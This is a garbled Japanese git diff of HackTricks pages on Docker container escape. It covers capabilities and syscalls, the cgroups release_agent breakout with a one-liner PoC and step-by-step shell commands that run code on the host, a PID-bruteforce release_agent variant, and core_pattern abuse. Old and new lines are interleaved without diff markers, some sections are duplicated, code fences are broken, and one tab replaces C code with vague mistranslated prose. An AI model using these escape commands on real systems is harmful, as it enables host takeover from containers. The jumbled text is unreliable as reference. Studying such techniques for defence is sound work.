* **権限:** Dockerは以下の権限を残します:`cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep`
* **システムコール:** これらは **rootユーザーが呼び出すことができない** システムコールです権限の不足とSeccompのため。他のシステムコールはエスケープを試みるために使用できるかもしれません
* **名前空間:** プロセスは名前空間によって**他のプロセスから完全に分離**されている必要があります。そのため、名前空間によって他のプロセスとのやり取りを脱出することはできません(デフォルトでは IPC、Unix ソケット、ネットワークサービス、D-Bus、他のプロセスの `/proc` を介して通信できません)。
* **ルートユーザー:** プロセスを実行するデフォルトのユーザーはルートユーザーです(ただし、権限は制限されています)。
* **機能:** Docker は次の機能を残します:`cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep`
* **Syscall:** これらは**ルートユーザーが呼び出せないシスコール**です(機能の不足 + Seccomp のため)。他のシスコールを使用して脱出を試みることができます
{% tabs %}
{% tab title="x64 システムコール" %}
{% tab title="x64 syscalls" %}
```yaml
0x067 -- syslog
0x070 -- setsid
@ -544,7 +541,7 @@ rootとして `docker exec` を実行できる場合おそらくsudoを使用
```
{% endtab %}
{% tab title="arm64 syscalls" %}
{% tab title="arm64 システムコール" %}
```
0x029 -- pivot_root
0x059 -- acct
@ -562,11 +559,9 @@ rootとして `docker exec` を実行できる場合おそらくsudoを使用
0x111 -- finit_module
0x118 -- bpf
```
```
{% endtab %}
{% tab title="syscall_bf.c" %}
```
{% tab title="syscall_bf.c" %}以下は、Dockerコンテナ内で特権昇格を行うためのシンプルな方法です。この手法は、Dockerコンテナ内で実行されているプロセスがホストマシン上のカーネルシステムコールを直接呼び出すことに基づいています。これにより、特権昇格が可能となります。この手法を使用すると、Dockerコンテナ内のプロセスがホストマシン上でroot権限を取得できる可能性があります。{% endtab %}
````c
// From a conversation I had with @arget131
// Fir bfing syscalss in x64
@ -630,7 +625,7 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
* [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
<figure><img src="../../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

116
linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
View file

@ -1,92 +1,74 @@
# Docker release\_agent cgroups エスケープ
# Docker release\_agent cgroups escape
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェックしてください</strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つけ
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください
</details>
### コンセプト実証の分析
このエクスプロイトをトリガーするには、`release_agent`ファイルを作成し、cgroup内の全プロセスを終了させることで`release_agent`の呼び出しをトリガーできるcgroupが必要です。これを実現する最も簡単な方法は、cgroupコントローラをマウントし、子cgroupを作成することです。
**詳細については、[元のブログ投稿](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)を参照してください。** これは要約です:
これを行うには、`/tmp/cgrp`ディレクトリを作成し、[RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroupコントローラをマウントし、子cgroupこの例では「x」と名付けられていますを作成します。全てのcgroupコントローラがテストされたわけではありませんが、このテクニックは大多数のcgroupコントローラで機能するはずです。
**`mount: /tmp/cgrp: special device cgroup does not exist`**と表示される場合、あなたのセットアップにRDMA cgroupコントローラがないためです。**`rdma`を`memory`に変更することで修正できます**。RDMAを使用しているのは、元のPoCがそれにのみ対応していたためです。
cgroupコントローラはグローバルリソースであり、異なる権限で複数回マウントすることができ、一つのマウントで行われた変更は別のマウントにも適用されることに注意してください。
以下に「x」子cgroupの作成とそのディレクトリリストを示します。
```shell-session
root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
root@b11cf9eab4fd:/# ls /tmp/cgrp/
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x
root@b11cf9eab4fd:/# ls /tmp/cgrp/x
cgroup.clone_children cgroup.procs notify_on_release rdma.current rdma.max tasks
元のPoC:
```shell
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
```
次に、"x" cgroupのリリース時にcgroup通知を**有効にする**ために、その`notify_on_release`ファイルに**1を書き込みます**。また、RDMA cgroupのリリースエージェントがコンテナ内で後で作成する`/cmd`スクリプトを実行するように設定し、ホスト上の`release_agent`ファイルに`/cmd`スクリプトのパスを書き込みます。これを行うには、`/etc/mtab`ファイルからコンテナのホスト上のパスを取得します。
証明コンセプトPoCは、`release_agent`ファイルを作成し、その呼び出しをトリガーして、コンテナホストで任意のコマンドを実行する方法を示しています。以下は、関連する手順の概要です:
コンテナで追加または変更されたファイルはホスト上に存在し、コンテナのパスとホスト上のパスの両方から変更することが可能です。
これらの操作は以下の通りです:
```shell-session
root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
1. **環境の準備:**
- `/tmp/cgrp`ディレクトリを作成して、cgroupのマウントポイントとして使用します。
- RDMA cgroupコントローラをこのディレクトリにマウントします。RDMAコントローラが存在しない場合は、代替として`memory` cgroupコントローラを使用することが推奨されています。
```shell
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
```
ホスト上で作成する予定の `/cmd` スクリプトへのパスに注意してください:
```shell-session
root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd
2. **子Cgroupの設定:**
- マウントされたcgroupディレクトリ内に "x" という名前の子Cgroupが作成されます。
- "x" Cgroupのnotify_on_releaseファイルに1を書き込むことで、"x" Cgroupの通知が有効になります。
```shell
echo 1 > /tmp/cgrp/x/notify_on_release
```
```markdown
これで、`ps aux` コマンドを実行し、その出力をホスト上の出力ファイルの完全なパスを指定してコンテナの `/output` に保存するように `/cmd` スクリプトを作成します。最後に、`/cmd` スクリプトの内容を表示して確認します:
3. **リリースエージェントの設定:**
- ホスト上のコンテナのパスは、/etc/mtab ファイルから取得されます。
- 次に、cgroupのrelease_agent ファイルが、取得したホストパスにある /cmd というスクリプトを実行するように設定されます。
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
```
```shell-session
root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
root@b11cf9eab4fd:/# chmod a+x /cmd
root@b11cf9eab4fd:/# cat /cmd
#!/bin/sh
ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output
4. **/cmdスクリプトの作成と設定:**
- /cmdスクリプトはコンテナ内で作成され、ps auxを実行し、出力をコンテナ内の/outputというファイルにリダイレクトするように設定されます。ホスト上の/outputのフルパスが指定されます。
```shell
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
```
最終的に、"x" 子 cgroup 内で直ちに終了するプロセスを生成することで攻撃を実行できます。`/bin/sh` プロセスを作成し、その PID を "x" 子 cgroup ディレクトリの `cgroup.procs` ファイルに書き込むと、`/bin/sh` が終了した後にホスト上のスクリプトが実行されます。ホスト上で実行された `ps aux` の出力は、コンテナ内の `/output` ファイルに保存されます:
```shell-session
root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
root@b11cf9eab4fd:/# head /output
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.1 1.0 17564 10288 ? Ss 13:57 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 13:57 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< 13:57 0:00 [kworker/0:0H-kblockd]
root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
5. **攻撃のトリガー:**
- "x"の子cgroup内でプロセスが開始され、すぐに終了します。
- これにより`release_agent`/cmdスクリプトがトリガーされ、ホストでps auxを実行し、出力をコンテナ内の/outputに書き込みます。
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
### 参考文献
* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをチェックしてください。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**してください
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有**してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見る
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**する
* **ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出してください。
</details>

162
linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
View file

@ -1,113 +1,38 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**フォローしてください。**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合**は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**@carlospolopm**をフォローしてください [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
- **ハッキングトリックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks)[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出してください。
</details>
詳細については、[https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)から**ブログポートをチェックしてください**。これは要約です:
# はじめに
この技術は、Kata Containersや特定の`devicemapper`設定など、コンテナのファイルシステムパスを隠すストレージドライバー設定によって引き起こされる課題を克服し、**コンテナ内からホストコードを実行する方法**を概説しています。
以前のPoCは、例えば`overlayfs`のように、**マウントポイントのフルホストパス**を公開するストレージドライバーでコンテナが設定されている場合にはうまく機能しますが、**ホストファイルシステムのマウントポイントを明らかにしない**設定もあります。
主なステップ:
このPoCでは、ホストのファイルシステム内にあるコンテナの場所のパスを使用する代わりに、ホスト内のコンテナPIDを発見する方法について説明します。
1. **プロセスIDPIDの特定** Linux疑似ファイルシステム内の`/proc/<pid>/root`シンボリックリンクを使用すると、コンテナ内の任意のファイルにホストのファイルシステムからアクセスできます。これにより、ホスト上のコンテナのファイルシステムパスを知る必要がなくなります。
2. **PID Bashing** ホスト上のPIDを検索するために総当たりアプローチが採用されます。これは、`/proc/<pid>/root/<file>`で特定のファイルの存在を順次チェックすることによって行われます。ファイルが見つかった場合、対応するPIDがターゲットコンテナ内で実行されているプロセスに属していることを示します。
3. **実行のトリガー:** 推測されたPIDパスが`cgroups release_agent`ファイルに書き込まれます。このアクションにより`release_agent`の実行がトリガーされます。このステップの成功は、出力ファイルの作成を確認することで確認されます。
## ホスト内のパスの場所を公開しないコンテナの例
### 悪用プロセス
### Kata Containers
```
root@container:~$ head -1 /etc/mtab
kataShared on / type 9p (rw,dirsync,nodev,relatime,mmap,access=client,trans=virtio)
```
[Kata Containers](https://katacontainers.io) はデフォルトでコンテナのルートファイルシステムを `9pfs` 経由でマウントします。これにより、Kata Containersの仮想マシン内のコンテナファイルシステムの位置情報は漏洩しません。
悪用プロセスには、コンテナ内で実行されているプロセスの正しいPIDを推測してホスト上でペイロードを実行するためのより詳細な一連のアクションが含まれています。以下は、その展開方法です
### Device Mapper
```
root@container:~$ head -1 /etc/mtab
/dev/sdc / ext4 rw,relatime,stripe=384 0 0
```
# PoC
1. **環境の初期化:** ペイロードスクリプト(`payload.sh`がホスト上で準備され、cgroup操作のためのユニークなディレクトリが作成されます。
2. **ペイロードの準備:** ペイロードスクリプトには、ホストで実行されるコマンドが含まれ、実行可能になります。
3. **Cgroupの設定** cgroupがマウントされ、構成されます。`notify_on_release`フラグが設定され、cgroupがリリースされるとペイロードが実行されるようになります。
4. **PIDの総当たり** ループが潜在的なPIDを繰り返し、推測された各PIDを`release_agent`ファイルに書き込みます。これにより、ペイロードスクリプトが`release_agent`として設定されます。
5. **トリガーと実行の確認:** 各PIDに対して、cgroupの`cgroup.procs`に書き込み、PIDが正しい場合は`release_agent`の実行がトリガーされます。ペイロードスクリプトの出力が見つかるまでループが続行され、成功した実行を示します。
必要な情報は、**コンテナホストに対して相対的な、コンテナ内で実行するファイルの完全なパス**です。コンテナ内のマウントポイントからこれを判別できない場合、他の方法を探る必要があります。
## /proc/\<pid>/root
Linuxの`/proc`擬似ファイルシステムは、システム上で実行されているすべてのプロセスのカーネルプロセスデータ構造を公開しています。これには、例えばコンテナ内で異なる名前空間で実行されているプロセスも含まれます。これは、コンテナでコマンドを実行し、ホスト上のプロセスの`/proc`ディレクトリにアクセスすることで示されますContainer
```bash
root@container:~$ sleep 100
```
```bash
root@host:~$ ps -eaf | grep sleep
root 28936 28909 0 10:11 pts/0 00:00:00 sleep 100
root@host:~$ ls -la /proc/`pidof sleep`
total 0
dr-xr-xr-x 9 root root 0 Nov 19 10:03 .
dr-xr-xr-x 430 root root 0 Nov 9 15:41 ..
dr-xr-xr-x 2 root root 0 Nov 19 10:04 attr
-rw-r--r-- 1 root root 0 Nov 19 10:04 autogroup
-r-------- 1 root root 0 Nov 19 10:04 auxv
-r--r--r-- 1 root root 0 Nov 19 10:03 cgroup
--w------- 1 root root 0 Nov 19 10:04 clear_refs
-r--r--r-- 1 root root 0 Nov 19 10:04 cmdline
...
-rw-r--r-- 1 root root 0 Nov 19 10:29 projid_map
lrwxrwxrwx 1 root root 0 Nov 19 10:29 root -> /
-rw-r--r-- 1 root root 0 Nov 19 10:29 sched
...
```
_ちなみに、`/proc/<pid>/root` データ構造は、長い間私を混乱させていました。なぜ `/` へのシンボリックリンクが役立つのか理解できませんでしたが、manページで実際の定義を読んでからです。_
> /proc/\[pid]/root
>
> UNIXおよびLinuxは、chroot(2)システムコールによって設定されるプロセスごとのファイルシステムのルートという考えをサポートしています。このファイルは、プロセスのルートディレクトリを指すシンボリックリンクであり、exeやfd/\*と同じように動作します。
>
> ただし、このファイルは単なるシンボリックリンクではありません。プロセス自体と同じファイルシステムのビュー(名前空間やプロセスごとのマウントセットを含む)を提供します。
**`/proc/<pid>/root` シンボリックリンクは、コンテナ内の任意のファイルへのホスト相対パスとして使用できます**
```bash
root@container:~$ echo findme > /findme
root@container:~$ sleep 100
```
```bash
root@host:~$ cat /proc/`pidof sleep`/root/findme
findme
```
{% hint style="warning" %}
**これにより、攻撃に必要な条件が、コンテナホストに対して相対的なファイルパスを知ることから、コンテナ内で実行されている**_**任意の**_**プロセスのpidを知ることに変わります。**
{% endhint %}
## Pid Bashing <a href="#pid-bashing" id="pid-bashing"></a>
これは実際には簡単な部分です。LinuxではプロセスIDは数値であり、順番に割り当てられます。`init`プロセスにはプロセスID `1`が割り当てられ、その後のプロセスにはインクリメンタルなIDが割り当てられます。**コンテナ内のプロセスのホストプロセスIDを特定するために、ブルートフォースのインクリメンタル検索が使用されることがあります**
```
root@container:~$ echo findme > /findme
root@container:~$ sleep 100
```
ホスト
```bash
root@host:~$ COUNTER=1
root@host:~$ while [ ! -f /proc/${COUNTER}/root/findme ]; do COUNTER=$((${COUNTER} + 1)); done
root@host:~$ echo ${COUNTER}
7822
root@host:~$ cat /proc/${COUNTER}/root/findme
findme
```
## 全体をまとめる <a href="#putting-it-all-together" id="putting-it-all-together"></a>
この攻撃を完了するために、`/proc/<pid>/root/payload.sh` のパスの **PIDを推測するために** **ブルートフォース技術**が使用できます。**各イテレーション**では、推測されたpid **パスをcgroupsの `release_agent` ファイルに書き込み**、`release_agent` をトリガーし、出力ファイルが作成されたかどうかを確認します。
この技術の唯一の注意点は、それが微妙ではなく、pidカウントを非常に高くする可能性があるということです。長時間実行されるプロセスは実行されないため、これは信頼性の問題を引き起こすべきではありませんが、その点については私の言葉を引用しないでください。
以下のPoCは、これらの技術を実装して、**cgroupsの `release_agent` 機能**を使用して特権コンテナから脱出するためのFelixの元のPoCよりも一般的な攻撃を提供します
ブログポストからのPoC
```bash
#!/bin/sh
@ -167,49 +92,16 @@ sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}
```
実行されたPoCは、特権コンテナ内で以下のような出力を提供するはずです
```bash
root@container:~$ ./release_agent_pid_brute.sh
Checking pid 100
Checking pid 200
Checking pid 300
Checking pid 400
Checking pid 500
Checking pid 600
Checking pid 700
Checking pid 800
Checking pid 900
Checking pid 1000
Checking pid 1100
Checking pid 1200
Done! Output:
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 11:25 ? 00:00:01 /sbin/init
root 2 0 0 11:25 ? 00:00:00 [kthreadd]
root 3 2 0 11:25 ? 00:00:00 [rcu_gp]
root 4 2 0 11:25 ? 00:00:00 [rcu_par_gp]
root 5 2 0 11:25 ? 00:00:00 [kworker/0:0-events]
root 6 2 0 11:25 ? 00:00:00 [kworker/0:0H-kblockd]
root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq]
root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]
...
```
# 参考文献
* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れ
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをチェックしてください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**してください。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有**してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを発見する
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)をフォローする**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>

68
linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
View file

@ -4,29 +4,28 @@
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は**[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)を入手す
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**@carlospolopm**を**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
* **ハッキングトリックを共有するには** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出してください。
</details>
`/proc`および`/sys`の適切な名前空間分離なしでの公開は、攻撃面の拡大や情報漏洩など、重大なセキュリティリスクをもたらします。これらのディレクトリには、誤って構成されたり、権限のないユーザーによってアクセスされたりすると、コンテナの脱出、ホストの変更、またはさらなる攻撃を助長する情報を含む機密ファイルが含まれています。たとえば、`-v /proc:/host/proc`を誤ってマウントすると、パスベースの性質によりAppArmor保護がバイパスされ、`/host/proc`が保護されなくなります。
`/proc`および`/sys`の公開が適切な名前空間の分離なしで行われると、攻撃面の拡大や情報漏洩など、重大なセキュリティリスクが発生します。これらのディレクトリには、誤って構成されたり、権限のないユーザーによってアクセスされたりすると、コンテナの脱出、ホストの変更、またはさらなる攻撃を助長する情報を含む機密ファイルが含まれています。たとえば、`-v /proc:/host/proc`を誤ってマウントすると、パスベースの性質によりAppArmor保護がバイパスされ、`/host/proc`が保護されなくなります。
各潜在的な脆弱性の詳細について[https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)で確認できます。
**各潜在的な脆弱性の詳細は[https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)で見つけることができます。**
# procfsの脆弱性
## `/proc/sys`
このディレクトリは通常`sysctl(2)`を介してカーネル変数を変更するためのアクセスを許可し、いくつかの懸念のあるサブディレクトリを含んでいます:
このディレクトリは通常`sysctl(2)`を介してカーネル変数を変更するためのアクセスを許可し、いくつかの懸念のサブディレクトリを含んでいます。
### **`/proc/sys/kernel/core_pattern`**
- [core(5)](https://man7.org/linux/man-pages/man5/core.5.html)で説明されています。
- 最初の128バイトを引数として使用してコアファイル生成時に実行するプログラムを定義できます。ファイルがパイプ`|`で始まる場合、コードの実行につながる可能性があります。
- **テストと悪用の例**
- 最初の128バイトを引数として使用してコアファイル生成時に実行するプログラムを定義することができます。ファイルがパイプ`|`で始まる場合、コードの実行につながる可能性があります。
- **テストおよび悪用例**
```bash
[ -w /proc/sys/kernel/core_pattern ] && echo Yes # 書き込みアクセスをテスト
cd /proc/sys/kernel
